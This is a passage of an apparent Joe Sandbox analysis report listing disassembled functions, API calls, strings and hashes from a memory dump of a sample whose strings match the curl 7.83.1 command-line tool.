                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdup
                                    • String ID: Accept$Accept: application/json$Content-Type$Content-Type: application/json$curl/7.83.1$host$out of memory$proxy
                                    • API String ID: 1169197092-2108368468
                                    • Opcode ID: 8d138e63a93f795937277e8bbe8129fd0f5f197a6918387474990eaba407b5c2
                                    • Instruction ID: 7977274f24c11106f2ae753868c8c7b8e46a1290cd3d8a79d69bc7700471aa01
                                    • Opcode Fuzzy Hash: 8d138e63a93f795937277e8bbe8129fd0f5f197a6918387474990eaba407b5c2
                                    • Instruction Fuzzy Hash: 9021F33534C7015FEB159AA5AC427ABB7E6DFC03A4F10643EE445B72C6EB709C858B10
                                    Function 00E089A1 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 40COMMON
                                    Download Yara Rule
                                    APIs
                                    • puts.API-MS-WIN-CRT-STDIO-L1-1-0(Usage: curl [options...] <url>), ref: 00E089A9
                                    • puts.API-MS-WIN-CRT-STDIO-L1-1-0(This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".), ref: 00E089C3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E08A13
                                    Strings
                                    • all, xrefs: 00E089CC
                                    • category, xrefs: 00E089E6
                                    • Usage: curl [options...] <url>, xrefs: 00E089A2
                                    • Invalid category provided, here is a list of all categories:, xrefs: 00E08A01
                                    • This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all"., xrefs: 00E089BE
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: puts$free
                                    • String ID: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".$Invalid category provided, here is a list of all categories:$Usage: curl [options...] <url>$all$category
                                    • API String ID: 1067472072-287794235
                                    • Opcode ID: 49b8002cd2ea1247eff305fffd0d720cecb31151f4f9683f676b168a752dfa11
                                    • Instruction ID: 13b82090f62caba47497ac3a492e31d15d8f2ecc17cb07244d4b420915865574
                                    • Opcode Fuzzy Hash: 49b8002cd2ea1247eff305fffd0d720cecb31151f4f9683f676b168a752dfa11
                                    • Instruction Fuzzy Hash: 7DF0E032309B1147CF2C37312F2B16E2551AF80766B987E2AFC95765C5EF54CC855253
                                    Function 00E4A0B9 Relevance: 15.3, APIs: 4, Strings: 6, Instructions: 299COMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4A1B4
                                      • Part of subcall function 00E4A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4A4FB
                                      • Part of subcall function 00E4A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4A52C
                                      • Part of subcall function 00E4A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4A54E
                                      • Part of subcall function 00E4A4C9: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4A565
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4A211
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4A267
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4A426
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$calloc$malloc
                                    • String ID: CompleteAuthToken failed: %s$HTTP$InitializeSecurityContext failed: %s$Negotiate$SPNEGO handshake failure (empty challenge message)$SSPI: couldn't get auth info
                                    • API String ID: 3103867982-170984166
                                    • Opcode ID: b4d8baaaa91af9691fe92cde6d3b4cb6dd649b471f9a46f00d6921d51533eefd
                                    • Instruction ID: ac13165e306269c98108e62d7382f44b750483a19be69a427f07df77270289ea
                                    • Opcode Fuzzy Hash: b4d8baaaa91af9691fe92cde6d3b4cb6dd649b471f9a46f00d6921d51533eefd
                                    • Instruction Fuzzy Hash: CDC15D71A416299FDB24DF15EC54AD9B7B4FF08324F0491AAE809F7650DBB0AE84CF81
                                    Function 00E1BF00 Relevance: 15.3, APIs: 4, Strings: 6, Instructions: 255COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1C0A8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1C0C1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1C19D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1C1B7
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,766B3C50,00000000,00E2182F), ref: 00E1F671
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F685
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F699
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6AD
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6C1
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6D5
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6E9
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F6FD
                                      • Part of subcall function 00E1F65C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F70F
                                      • Part of subcall function 00E20830: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2086B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$calloc
                                    • String ID: ALL$FLUSH$RELOAD$SESS$Set-Cookie:$ignoring failed cookie_init for %s
                                    • API String ID: 3095843317-3179978524
                                    • Opcode ID: bb2d28d3709769401e03925c36e811135ec83632ba2b0d5b784f5bf9951cb2c5
                                    • Instruction ID: 0169b07bb67e8baebb7bc8638fc9276e19c1ea69dedb0a909f255edf5d10e1a3
                                    • Opcode Fuzzy Hash: bb2d28d3709769401e03925c36e811135ec83632ba2b0d5b784f5bf9951cb2c5
                                    • Instruction Fuzzy Hash: 698106717446118BDB189F24AC916BE73D29F88754F24A03DE80AFB392DB74DC828B91
                                    Function 00E2443D Relevance: 15.2, APIs: 10, Instructions: 236COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E24488
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E244AE
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E1A931,?,?,00000000,00000030,?,?,?,?,?,?,?,?,?,00000000), ref: 00E24544
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E1A931,?,?,00000000,00000030,?,?,?,?,?,?,?,?,?,00000000), ref: 00E2456A
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E1A931,?,?,00000000,00000030,?,?,?,?,?,?,?,?,?,00000000), ref: 00E24590
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000), ref: 00E245AC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000), ref: 00E245C1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: malloc$___from_strstr_to_strchrfree
                                    • String ID:
                                    • API String ID: 402731313-0
                                    • Opcode ID: f3f2db75ba36fb470eda99e416a5db7cece7cec92b16db1a84c698f303ba893e
                                    • Instruction ID: c1e46518e2c4063130ed08aac0f623d6d1c46d507da6e91ff863638ddddeb06b
                                    • Opcode Fuzzy Hash: f3f2db75ba36fb470eda99e416a5db7cece7cec92b16db1a84c698f303ba893e
                                    • Instruction Fuzzy Hash: E9817EB2E0022ADFCF14DFA9E8505AEBBF5EF48354B14916AE855F7290DB709D04CB90
                                    Function 00E038AE Relevance: 15.2, APIs: 10, Instructions: 172COMMON
                                    Download Yara Rule
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E038EC
                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E038F4
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E03902
                                      • Part of subcall function 00E01018: _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00008000,00E03910), ref: 00E0101E
                                      • Part of subcall function 00E01018: _setmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00008000,00E03910), ref: 00E01025
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E03911
                                    • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E03919
                                    • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 00E0393E
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E0398D
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00E574AB), ref: 00E039B7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E039FD
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00E03A3D
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_func$_fileno_strdup$_fstat64_setmodefreeftell
                                    • String ID:
                                    • API String ID: 4154865980-0
                                    • Opcode ID: 8e2f95e17490f98cfc72d465b9708ffc3de50486ff642032dc9ae44a690bb479
                                    • Instruction ID: 4cf0aa08b0b8a59dc6f224c92a92f5cdba0ce31c7b9f6c2de1606399ef0e90b0
                                    • Opcode Fuzzy Hash: 8e2f95e17490f98cfc72d465b9708ffc3de50486ff642032dc9ae44a690bb479
                                    • Instruction Fuzzy Hash: 2B519172D007198FCB14CFB5C88469DBBF9EF84725F20551EE445BB284D7B09E858B40
                                    Function 00E149D3 Relevance: 15.1, APIs: 12, Instructions: 78COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E15D8C,766B3C50,00E216C0), ref: 00E149E7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E149FB
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A0F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A23
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A37
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A4B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A5F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A73
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A87
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14A9B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14AAF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E14AC3
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 590d31b0371dce6159ab8abf71580d9f9ab3c2b43aca5c877e1d2fde20295d65
                                    • Instruction ID: 0b2a92be3e029257a3db8db57e01c7fdd4722b6ec7b662d27f312b96f2a4d3ff
                                    • Opcode Fuzzy Hash: 590d31b0371dce6159ab8abf71580d9f9ab3c2b43aca5c877e1d2fde20295d65
                                    • Instruction Fuzzy Hash: 7D21B632614929DF8F092F26FC1845DBBA5FF482613158426E405A3675CFF92C198FD0
                                    Function 00E24AF4 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 169stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(%25,00000001,00000003), ref: 00E24B8D
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E24C01
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00E24C1F
                                    Strings
                                    • %25, xrefs: 00E24B88
                                    • Invalid IPv6 address format, xrefs: 00E24BEF
                                    • No valid port number in connect to host string (%s), xrefs: 00E24C3E
                                    • Please URL encode %% as %%25, see RFC 6874., xrefs: 00E24B9A
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrstrncmpstrtol
                                    • String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
                                    • API String ID: 236576716-4202423297
                                    • Opcode ID: 97291cd211cf58896bdfd09378576a8ccff6ed243e019ff43574d554b790549a
                                    • Instruction ID: 2ac9817653e0df21e94b4829a0aee0cf8a8d0833af24851bd34c5d973702b236
                                    • Opcode Fuzzy Hash: 97291cd211cf58896bdfd09378576a8ccff6ed243e019ff43574d554b790549a
                                    • Instruction Fuzzy Hash: 0C5189B5905325AFEB259F28FC523FDBBA99F0635CF102069E881B72D1D6708949CB40
                                    Function 00E20830 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 141fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2086B
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E208DD
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E57A20), ref: 00E208F7
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00001000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E2093F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2096E
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E20992
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00001000,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00E2126F), ref: 00E20A02
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E20A14
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fclosefree$__acrt_iob_funccallocfopenmalloc
                                    • String ID: Set-Cookie:
                                    • API String ID: 3610089413-2427311273
                                    • Opcode ID: f9eec703798cf73ed797dce5fbb498f4c3d8e686857c0dd3d3d7fed42ed1fb31
                                    • Instruction ID: 238e319b21e9f0df14b81a67bdd9e59183d854d2a9a5c4413ebaa3c798ad3134
                                    • Opcode Fuzzy Hash: f9eec703798cf73ed797dce5fbb498f4c3d8e686857c0dd3d3d7fed42ed1fb31
                                    • Instruction Fuzzy Hash: D4418E317087209FEB295B2978543AEBBD59FC4714F14506EF84AB72D3CAA48C8983D1
                                    Function 00E01411 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0( ,?,?,?,?,?,?,?,?,?), ref: 00E014A3
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?,?,?,?,?,?,?,?,?), ref: 00E01536
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?), ref: 00E0154F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fflushfputcfputs
                                    • String ID: $%02x $%04zx: $%s%s, %zu bytes (0x%zx)$<= Recv header
                                    • API String ID: 2904194729-208095841
                                    • Opcode ID: 638cc3d349e41646bd2223a595ce420fbcf548425e1e90cc776b452ccab78dc5
                                    • Instruction ID: 5b750c87b4cfc64cabb411e2c9c2169df9c1a7035ddde206e55a33f6d67e4c97
                                    • Opcode Fuzzy Hash: 638cc3d349e41646bd2223a595ce420fbcf548425e1e90cc776b452ccab78dc5
                                    • Instruction Fuzzy Hash: 2E41F032A00258AFCF10CF54DC85AAD7BB1EB00319F145499FC1ABF191C2719E94CB91
                                    Function 00E0E2DD Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 125COMMON
                                    Download Yara Rule
                                    APIs
                                    • __aulldiv.LIBCMT ref: 00E0E314
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E0E346
                                    • __aulldiv.LIBCMT ref: 00E0E39A
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E0E3CF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__aulldiv__ehfuncinfo$??2@
                                    • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd$--:--:--
                                    • API String ID: 1185945948-1858174321
                                    • Opcode ID: 0159bf44aa42cbf1db8c1944e49ac8cace723c6c9908cb3fd788bf57c2b3e91b
                                    • Instruction ID: 35cfa6c284653604011884a68056b569b78bf9a1ea666697e9041b8249671a48
                                    • Opcode Fuzzy Hash: 0159bf44aa42cbf1db8c1944e49ac8cace723c6c9908cb3fd788bf57c2b3e91b
                                    • Instruction Fuzzy Hash: BC310971B407047AEB2166B94C4BFAF6DEDCBC5F90F14A934B904F72D2E5B19E408660
                                    Function 00E077E3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 113stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E0781F
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E57A20), ref: 00E07833
                                    • strtok.API-MS-WIN-CRT-STRING-L1-1-0(?,00E58E74), ref: 00E0786E
                                    • strtok.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00E58E74), ref: 00E078A2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E078B7
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E078CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: strtok$__acrt_iob_funcfclosefopenfree
                                    • String ID: Pl$p
                                    • API String ID: 896044852-1114704627
                                    • Opcode ID: b6363d7a8d853c546ab4eeffd5440469978889a1e5ffa9b824ec1a0081fc9f24
                                    • Instruction ID: 0f152b5f0d385dfefcec0dfca3c287ba9702cf7e292fc77782f3abe1c6fed807
                                    • Opcode Fuzzy Hash: b6363d7a8d853c546ab4eeffd5440469978889a1e5ffa9b824ec1a0081fc9f24
                                    • Instruction Fuzzy Hash: 9131E431A0C7429FC7188B2488986A77BE1BB95318F64AC1DF0D6B32C1EB70E885C721
                                    Function 00E07BEB Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 87COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E07BFD
                                      • Part of subcall function 00E109FA: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 00E10A07
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07C56
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07CB1
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E07CC1
                                    Strings
                                    • Invalid character is found in given range. A specified range MUST have only digits in 'start'-'stop'. The server's response to this request is uncertain., xrefs: 00E07C99
                                    • %I64d-, xrefs: 00E07C40
                                    • A specified range MUST include at least one dash (-). Appending one for you!, xrefs: 00E07C26
                                    • unsupported range point, xrefs: 00E08216
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$___from_strstr_to_strchr_errno_strdup
                                    • String ID: %I64d-$A specified range MUST include at least one dash (-). Appending one for you!$Invalid character is found in given range. A specified range MUST have only digits in 'start'-'stop'. The server's response to this request is uncertain.$unsupported range point
                                    • API String ID: 4096323884-1864133270
                                    • Opcode ID: 401381f160f06e92d36800f28f47f578f038fdc081867401d3e4ce394de48398
                                    • Instruction ID: 5428d38db54328b9eeea4f29e4d2e43ecad6f1abcdb295e1c7988c844f690dcd
                                    • Opcode Fuzzy Hash: 401381f160f06e92d36800f28f47f578f038fdc081867401d3e4ce394de48398
                                    • Instruction Fuzzy Hash: 7121B77170C3019EE6249B309D86BBBB7E59F98305F142C0EF5D6B61C2DE71E8C89621
                                    Function 00E03B00 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E03B75
                                    • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 00E03B83
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E03B8C
                                    • ferror.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E03B96
